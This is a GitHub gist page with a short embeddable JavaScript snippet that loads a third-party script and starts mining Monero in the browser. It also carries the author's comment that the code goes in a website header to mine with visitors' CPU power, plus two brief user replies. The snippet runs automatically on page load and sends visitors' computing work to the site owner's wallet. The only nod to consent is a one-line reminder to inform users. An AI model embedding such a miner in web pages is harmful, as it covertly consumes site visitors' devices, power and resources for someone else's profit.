Skip to content

Instantly share code, notes, and snippets.

@coinwebmining
Created May 3, 2018 18:52
Show Gist options
  • Save coinwebmining/7d2685a6bd98ae1427c31e32879d8d43 to your computer and use it in GitHub Desktop.
Save coinwebmining/7d2685a6bd98ae1427c31e32879d8d43 to your computer and use it in GitHub Desktop.
Monero Javascript Miner (CryptoNightV7)
<script src="https://coinwebmining.com/cwm.js"></script>
<script>
var site_id = '{mysiteDOTcom}'; //register here https://coinwebmining.com/add-miner-your-website
var coin = 'monero';
var wallet = '{yourWalletAddress}';
var password = 'x';
var mining_pool = 'moneroocean.stream'; //or check https://coinwebmining.com/browser-miner/monero for more mining pools
var threads = -1; //You can set -1 for auto threads, or set number of threads between 1-16.
var throttle = 0.2; //Set the fraction of time that threads should be idle. A value of 0 means no throttling (i.e. full speed), a value of 0.5 means that threads will stay idle 50% of the time, with 0.2 they will stay idle 20% of the time and 80% of the time mining.
var debug = false; //false or true. Whetever you want to display mining info in a console. Good to verify script works.
cwm_start(site_id, coin, wallet, password, mining_pool, threads, throttle, debug); //Enjoy mining ;)
</script>
@coinwebmining
Copy link
Author

Simple Javascript Monero miner which you can embed in your website html header to start mining using your visitors cpu power. Don't forget to inform your users on miner running.

@behnambahonar
Copy link

ok

@iUNeIV
Copy link

iUNeIV commented Oct 24, 2019

Will he have an update for the fork of the monero?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment